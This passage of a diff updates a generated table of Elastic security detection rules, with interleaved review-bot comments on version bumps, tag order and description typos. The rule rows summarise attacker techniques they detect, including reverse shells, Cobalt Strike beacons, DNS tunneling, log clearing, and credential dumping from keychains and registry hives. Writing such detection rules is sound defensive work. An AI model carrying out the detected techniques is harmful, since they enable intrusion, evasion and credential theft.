An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<clearing-windows-console-history, Clearing Windows Console History>> |Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<clearing-windows-event-logs, Clearing Windows Event Logs>> |Identifies attempts to clear or disable Windows event log stores using Windows wevetutil command. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<clearing-windows-event-logs, Clearing Windows Event Logs>> |Identifies attempts to clear or disable Windows event log stores using Windows wevetutil command. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 -|<<cobalt-strike-command-and-control-beacon, Cobalt Strike Command and Control Beacon>> |Cobalt Strike is a threat emulation platform commonly modified and used by adversaries to conduct network attack and exploitation campaigns. 
This rule detects a network activity algorithm leveraged by Cobalt Strike implant beacons for command and control. |[Use Case: Threat Detection], [Tactic: Command and Control], [Domain: Endpoint] |8.3.0 |104 +|<<cobalt-strike-command-and-control-beacon, Cobalt Strike Command and Control Beacon>> |Cobalt Strike is a threat emulation platform commonly modified and used by adversaries to conduct network attack and exploitation campaigns. This rule detects a network activity algorithm leveraged by Cobalt Strike implant beacons for command and control. |[Use Case: Threat Detection], [Tactic: Command and Control], [Domain: Endpoint] |8.3.0 |105 |<<code-signing-policy-modification-through-built-in-tools, Code Signing Policy Modification Through Built-in tools>> |Identifies attempts to disable/modify the code signing policy through system native utilities. Code signing provides authenticity on a program, and grants the user with the ability to check whether the program has been tampered with. By allowing the execution of unsigned or self-signed code, threat actors can craft and execute malicious code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |5 -|<<code-signing-policy-modification-through-registry, Code Signing Policy Modification Through Registry>> |Identifies attempts to disable/modify the code signing policy through the registry. Code signing provides authenticity on a program, and grants the user with the ability to check whether the program has been tampered with. By allowing the execution of unsigned or self-signed code, threat actors can craft and execute malicious code. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |5 +|<<code-signing-policy-modification-through-registry, Code Signing Policy Modification Through Registry>> |Identifies attempts to disable/modify the code signing policy through the registry. Code signing provides authenticity on a program, and grants the user with the ability to check whether the program has been tampered with. By allowing the execution of unsigned or self-signed code, threat actors can craft and execute malicious code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |6 -|<<command-execution-via-solarwinds-process, Command Execution via SolarWinds Process>> |A suspicious SolarWinds child process (Cmd.exe or Powershell.exe) was detected. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<command-execution-via-solarwinds-process, Command Execution via SolarWinds Process>> |A suspicious SolarWinds child process (Cmd.exe or Powershell.exe) was detected. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Initial Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<command-prompt-network-connection, Command Prompt Network Connection>> |Identifies cmd.exe making a network connection. Adversaries could abuse cmd.exe to download or execute malware from a remote URL. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |105 -|<<command-shell-activity-started-via-rundll32, Command Shell Activity Started via RunDLL32>> |Identifies command shell activity started via RunDLL32, which is commonly abused by attackers to host malicious code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<command-shell-activity-started-via-rundll32, Command Shell Activity Started via RunDLL32>> |Identifies command shell activity started via RunDLL32, which is commonly abused by attackers to host malicious code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Credential Access], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<component-object-model-hijacking, Component Object Model Hijacking>> |Identifies Component Object Model (COM) hijacking via registry modification. Adversaries may establish persistence by executing malicious content triggered by hijacked references to COM objects. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<component-object-model-hijacking, Component Object Model Hijacking>> |Identifies Component Object Model (COM) hijacking via registry modification. Adversaries may establish persistence by executing malicious content triggered by hijacked references to COM objects. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<compression-dll-loaded-by-unusual-process, Compression DLL Loaded by Unusual Process>> |Identifies the image load of a compression DLL. Adversaries will often compress and encrypt data in preparation for exfiltration. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |2 -|<<conhost-spawned-by-suspicious-parent-process, Conhost Spawned By Suspicious Parent Process>> |Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<conhost-spawned-by-suspicious-parent-process, Conhost Spawned By Suspicious Parent Process>> |Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<connection-to-commonly-abused-free-ssl-certificate-providers, Connection to Commonly Abused Free SSL Certificate Providers>> |Identifies unusual processes connecting to domains using known free SSL certificates. Adversaries may employ a known encryption algorithm to conceal command and control traffic. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |104 -|<<connection-to-commonly-abused-web-services, Connection to Commonly Abused Web Services>> |Adversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 +|<<connection-to-commonly-abused-web-services, Connection to Commonly Abused Web Services>> |Adversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 -|<<connection-to-external-network-via-telnet, Connection to External Network via Telnet>> |Telnet provides a command line interface for communication with a remote device or server. This rule identifies Telnet network connections to publicly routable IP addresses. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |104 +|<<connection-to-external-network-via-telnet, Connection to External Network via Telnet>> |Telnet provides a command line interface for communication with a remote device or server. This rule identifies Telnet network connections to publicly routable IP addresses. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |105 -|<<connection-to-internal-network-via-telnet, Connection to Internal Network via Telnet>> |Telnet provides a command line interface for communication with a remote device or server. This rule identifies Telnet network connections to non-publicly routable IP addresses. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |104 +|<<connection-to-internal-network-via-telnet, Connection to Internal Network via Telnet>> |Telnet provides a command line interface for communication with a remote device or server. This rule identifies Telnet network connections to non-publicly routable IP addresses. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |105 |<<container-management-utility-run-inside-a-container, Container Management Utility Run Inside A Container>> |This rule detects when a container management binary is run from inside a container. These binaries are critical components of many containerized environments, and their presence and execution in unauthorized containers could indicate compromise or a misconfiguration. |[Data Source: Elastic Defend for Containers], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution] |8.8.0 |2 
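Review bot: the Bypass UAC via Sdclt row gains [Tactic: Defense Evasion] but keeps rule version 1 (and minimum stack `None`), while the Bypass UAC via Event Viewer row receives the same added tactic and is bumped from 107 to 108; either the Sdclt rule version should move too, or this table is out of sync with the rule file it was generated from. Separately, `wevetutil` in the Clearing Windows Event Logs description is carried over unchanged on both the `-` and `+` lines; the utility is `wevtutil`, and since this summary is generated the fix belongs in the rule's description upstream. Several other rows in this hunk (BPF filter applied using TC, Chkconfig Service Add, Clearing Windows Event Logs, Cobalt Strike Command and Control Beacon, Code Signing Policy Modification Through Registry, Connection to Commonly Abused Web Services, both Telnet rules) change only the rule version number with no visible description or tag difference; that is expected when the query changed, but worth confirming against the rule sources so the bump is not noise.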
@@ -370,13 +372,13 @@ and their rule type is `machine_learning`. |<<control-panel-process-with-unusual-arguments, Control Panel Process with Unusual Arguments>> |Identifies unusual instances of Control Panel with suspicious keywords or paths in the process command line value. Adversaries may abuse control.exe to proxy execution of malicious code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<creation-of-hidden-files-and-directories-via-commandline, Creation of Hidden Files and Directories via CommandLine>> |Users can mark specific files as hidden simply by putting a "." as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion. This rule looks for hidden files or folders in common writable directories. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |105 +|<<creation-of-hidden-files-and-directories-via-commandline, Creation of Hidden Files and Directories via CommandLine>> |Users can mark specific files as hidden simply by putting a "." as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion. This rule looks for hidden files or folders in common writable directories. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |106 |<<creation-of-hidden-launch-agent-or-daemon, Creation of Hidden Launch Agent or Daemon>> |Identifies the creation of a hidden launch agent or daemon. An adversary may establish persistence by installing a new launch agent or daemon which executes at login. 
|[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 |<<creation-of-hidden-login-item-via-apple-script, Creation of Hidden Login Item via Apple Script>> |Identifies the execution of osascript to create a hidden login item. This may indicate an attempt to persist a malicious program while concealing its presence. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |105 -|<<creation-of-hidden-shared-object-file, Creation of Hidden Shared Object File>> |Identifies the creation of a hidden shared object (.so) file. Users can mark specific files as hidden simply by putting a "." as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<creation-of-hidden-shared-object-file, Creation of Hidden Shared Object File>> |Identifies the creation of a hidden shared object (.so) file. Users can mark specific files as hidden simply by putting a "." as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<creation-of-kernel-module, Creation of Kernel Module>> |Identifies activity related to loading kernel modules on Linux via creation of new ko files in the LKM directory. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 
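Review bot: both changed rows in this hunk (Creation of Hidden Files and Directories via CommandLine 105 to 106, Creation of Hidden Shared Object File 106 to 107) are version-only bumps with identical description and tags, so a reader of this table has nothing to diff; if the underlying query or index patterns changed, consider surfacing that in the release notes alongside the version bump.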
@@ -388,7 +390,7 @@ and their rule type is `machine_learning`. |<<creation-or-modification-of-root-certificate, Creation or Modification of Root Certificate>> |Identifies the creation or modification of a local trusted root certificate in Windows. The install of a malicious root certificate would allow an attacker the ability to masquerade malicious files as valid signed components from any entity (for example, Microsoft). It could also allow an attacker to decrypt SSL traffic. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<creation-or-modification-of-a-new-gpo-scheduled-task-or-service, Creation or Modification of a new GPO Scheduled Task or Service>> |Detects the creation or modification of a new Group Policy based scheduled task or service. These methods are used for legitimate system administration, but can also be abused by an attacker with domain admin permissions to execute a malicious payload remotely on all or a subset of the domain joined machines. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<creation-or-modification-of-a-new-gpo-scheduled-task-or-service, Creation or Modification of a new GPO Scheduled Task or Service>> |Detects the creation or modification of a new Group Policy based scheduled task or service. These methods are used for legitimate system administration, but can also be abused by an attacker with domain admin permissions to execute a malicious payload remotely on all or a subset of the domain joined machines. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<credential-acquisition-via-registry-hive-dumping, Credential Acquisition via Registry Hive Dumping>> |Identifies attempts to export a registry hive which may contain credentials using the Windows reg.exe tool. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 
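Review bot: the new [Tactic: Privilege Escalation] tag on Creation or Modification of a new GPO Scheduled Task or Service is inserted ahead of the existing [Tactic: Persistence], whereas the other rows touched by this patch append newly added tactics after the existing ones (for example Bypass UAC via Event Viewer and Conhost Spawned By Suspicious Parent Process); if the generator emits tactics in rule-file order this is fine, otherwise keep the ordering consistent so future diffs of this table stay readable.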
@@ -400,7 +402,7 @@ and their rule type is `machine_learning`. |<<credential-manipulation-prevented-elastic-endgame, Credential Manipulation - Prevented - Elastic Endgame>> |Elastic Endgame prevented Credential Manipulation. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information. |[Data Source: Elastic Endgame], [Use Case: Threat Detection], [Tactic: Privilege Escalation] |8.3.0 |101 -|<<cron-job-created-or-changed-by-previously-unknown-process, Cron Job Created or Changed by Previously Unknown Process>> |Linux cron jobs are scheduled tasks that can be leveraged by malicious actors for persistence, privilege escalation and command execution. By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |4 +|<<cron-job-created-or-changed-by-previously-unknown-process, Cron Job Created or Changed by Previously Unknown Process>> |Linux cron jobs are scheduled tasks that can be leveraged by malicious actors for persistence, privilege escalation and command execution. By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |5 |<<cyberark-privileged-access-security-error, CyberArk Privileged Access Security Error>> |Identifies the occurrence of a CyberArk Privileged Access Security (PAS) error level audit event. 
The event.code correlates to the CyberArk Vault Audit Action Code. |[Data Source: CyberArk PAS], [Use Case: Log Auditing], [Use Case: Threat Detection], [Tactic: Privilege Escalation] |8.3.0 |102 
@@ -408,27 +410,27 @@ and their rule type is `machine_learning`. |<<dns-tunneling, DNS Tunneling>> |A machine learning job detected unusually large numbers of DNS queries for a single top-level DNS domain, which is often used for DNS tunneling. DNS tunneling can be used for command-and-control, persistence, or data exfiltration activity. For example, dnscat tends to generate many DNS questions for a top-level domain as it uses the DNS protocol to tunnel data. |[Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Command and Control] |8.3.0 |103 -|<<dns-over-https-enabled-via-registry, DNS-over-HTTPS Enabled via Registry>> |Identifies when a user enables DNS-over-HTTPS. This can be used to hide internet activity or the process of exfiltrating data. With this enabled, an organization will lose visibility into data such as query type, response, and originating IP, which are used to determine bad actors. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<dns-over-https-enabled-via-registry, DNS-over-HTTPS Enabled via Registry>> |Identifies when a user enables DNS-over-HTTPS. This can be used to hide internet activity or the process of exfiltrating data. With this enabled, an organization will lose visibility into data such as query type, response, and originating IP, which are used to determine bad actors. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<default-cobalt-strike-team-server-certificate, Default Cobalt Strike Team Server Certificate>> |This rule detects the use of the default Cobalt Strike Team Server TLS certificate. 
Cobalt Strike is software for Adversary Simulations and Red Team Operations which are security assessments that replicate the tactics and techniques of an advanced adversary in a network. Modifications to the Packetbeat configuration can be made to include MD5 and SHA256 hashing algorithms (the default is SHA1). See the References section for additional information on module configuration. |[Tactic: Command and Control], [Threat: Cobalt Strike], [Use Case: Threat Detection], [Domain: Endpoint] |8.3.0 |104 -|<<delete-volume-usn-journal-with-fsutil, Delete Volume USN Journal with Fsutil>> |Identifies use of the fsutil.exe to delete the volume USNJRNL. This technique is used by attackers to eliminate evidence of files created during post-exploitation activities. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 +|<<delayed-execution-via-ping, Delayed Execution via Ping>> |Identifies the execution of commonly abused Windows utilities via a delayed Ping execution. This behavior is often observed during malware installation and is consistent with an attacker attempting to evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 -|<<deleting-backup-catalogs-with-wbadmin, Deleting Backup Catalogs with Wbadmin>> |Identifies use of the wbadmin.exe to delete the backup catalog. Ransomware and other malware may do this to prevent system recovery. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<delete-volume-usn-journal-with-fsutil, Delete Volume USN Journal with Fsutil>> |Identifies use of the fsutil.exe to delete the volume USNJRNL. 
This technique is used by attackers to eliminate evidence of files created during post-exploitation activities. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 -|<<deprecated-potential-dns-tunneling-via-iodine, Deprecated - Potential DNS Tunneling via Iodine>> |Iodine is a tool for tunneling Internet protocol version 4 (IPV4) traffic over the DNS protocol to circumvent firewalls, network security groups, and network access lists while evading detection. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<deleting-backup-catalogs-with-wbadmin, Deleting Backup Catalogs with Wbadmin>> |Identifies use of the wbadmin.exe to delete the backup catalog. Ransomware and other malware may do this to prevent system recovery. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<deprecated-potential-process-injection-via-ld-preload-environment-variable, Deprecated - Potential Process Injection via LD_PRELOAD Environment Variable>> |This rule detects the execution of a process where the LD_PRELOAD environment variable is set. LD_PRELOAD can be used to inject a shared library into a binary at or prior to execution. A threat actor may do this in order to load a malicious shared library for the purposes of persistence, privilege escalation, and defense evasion. This activity is not common and will potentially indicate malicious or suspicious behavior. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.6.0 |3 +|<<deprecated-potential-reverse-shell-via-suspicious-parent-process, Deprecated - Potential Reverse Shell via Suspicious Parent Process>> |This detection rule detects the creation of a shell through a suspicious parent child relationship. Any reverse shells spawned by the specified utilities that use a forked process to initialize the connection attempt will be captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |5 |<<direct-outbound-smb-connection, Direct Outbound SMB Connection>> |Identifies unexpected processes making network connections over port 445. Windows File Sharing is typically implemented over Server Message Block (SMB), which communicates between hosts using port 445. When legitimate, these network connections are established by the kernel. Processes making 445/tcp connections may be port scanners, exploits, or suspicious user-level processes moving laterally. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 -|<<disable-windows-event-and-security-logs-using-built-in-tools, Disable Windows Event and Security Logs Using Built-in Tools>> |Identifies attempts to disable EventLog via the logman Windows utility, PowerShell, or auditpol. This is often done by attackers in an attempt to evade detection on a system. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<disable-windows-event-and-security-logs-using-built-in-tools, Disable Windows Event and Security Logs Using Built-in Tools>> |Identifies attempts to disable EventLog via the logman Windows utility, PowerShell, or auditpol. This is often done by attackers in an attempt to evade detection on a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<disable-windows-firewall-rules-via-netsh, Disable Windows Firewall Rules via Netsh>> |Identifies use of the netsh.exe to disable or weaken the local firewall. Attackers will use this command line tool to disable the firewall during troubleshooting or to enable network mobility. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<disabling-user-account-control-via-registry-modification, Disabling User Account Control via Registry Modification>> |User Account Control (UAC) can help mitigate the impact of malware on Windows hosts. With UAC, apps and tasks always run in the security context of a non-administrator account, unless an administrator specifically authorizes administrator-level access to the system. This rule identifies registry value changes to bypass User Access Control (UAC) protection. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<disabling-user-account-control-via-registry-modification, Disabling User Account Control via Registry Modification>> |User Account Control (UAC) can help mitigate the impact of malware on Windows hosts. With UAC, apps and tasks always run in the security context of a non-administrator account, unless an administrator specifically authorizes administrator-level access to the system. This rule identifies registry value changes to bypass User Access Control (UAC) protection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<disabling-windows-defender-security-settings-via-powershell, Disabling Windows Defender Security Settings via PowerShell>> |Identifies use of the Set-MpPreference PowerShell command to disable or weaken certain Windows Defender settings. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<disabling-windows-defender-security-settings-via-powershell, Disabling Windows Defender Security Settings via PowerShell>> |Identifies use of the Set-MpPreference PowerShell command to disable or weaken certain Windows Defender settings. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<discovery-of-domain-groups, Discovery of Domain Groups>> |Identifies the execution of Linux built-in commands related to account or group enumeration. 
Adversaries may use account and group information to orient themselves before deciding how to act. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 
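Review bot: the deprecated-rule cleanup in this hunk is inconsistent. The two `Deprecated - ...` rows (Potential DNS Tunneling via Iodine, Potential Process Injection via LD_PRELOAD Environment Variable) are dropped, but a new `+|<<deprecated-potential-reverse-shell-via-suspicious-parent-process, Deprecated - Potential Reverse Shell via Suspicious Parent Process>>` row is added in the same hunk. Either drop that row as well or keep all deprecated rows, but not a mix. Separately, the re-emitted Disabling User Account Control row expands the acronym correctly as "User Account Control" and then says "User Access Control (UAC)" two sentences later; since these tables are generated, that wording should be fixed in the rule's description rather than patched here.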
@@ -444,13 +446,13 @@ and their rule type is `machine_learning`. |<<dumping-of-keychain-content-via-security-command, Dumping of Keychain Content via Security Command>> |Adversaries may dump the content of the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features, including Wi-Fi and website passwords, secure notes, certificates, and Kerberos. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |104 -|<<dynamic-linker-copy, Dynamic Linker Copy>> |Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Threat: Orbit], [Data Source: Elastic Defend] |8.3.0 |104 +|<<dynamic-linker-copy, Dynamic Linker Copy>> |Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Threat: Orbit], [Data Source: Elastic Defend] |8.3.0 |105 -|<<esxi-discovery-via-find, ESXI Discovery via Find>> |Identifies instances where the 'find' command is started on a Linux system with arguments targeting specific VM-related paths, such as "/etc/vmware/", "/usr/lib/vmware/", or "/vmfs/*". These paths are associated with VMware virtualization software, and their presence in the find command arguments may indicate that a threat actor is attempting to search for, analyze, or manipulate VM-related files and configurations on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.5.0 |3 +|<<esxi-discovery-via-find, ESXI Discovery via Find>> |Identifies instances where the 'find' command is started on a Linux system with arguments targeting specific VM-related paths, such as "/etc/vmware/", "/usr/lib/vmware/", or "/vmfs/*". These paths are associated with VMware virtualization software, and their presence in the find command arguments may indicate that a threat actor is attempting to search for, analyze, or manipulate VM-related files and configurations on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.5.0 |4 -|<<esxi-discovery-via-grep, ESXI Discovery via Grep>> |Identifies instances where a process named 'grep', 'egrep', or 'pgrep' is started on a Linux system with arguments related to virtual machine (VM) files, such as "vmdk", "vmx", 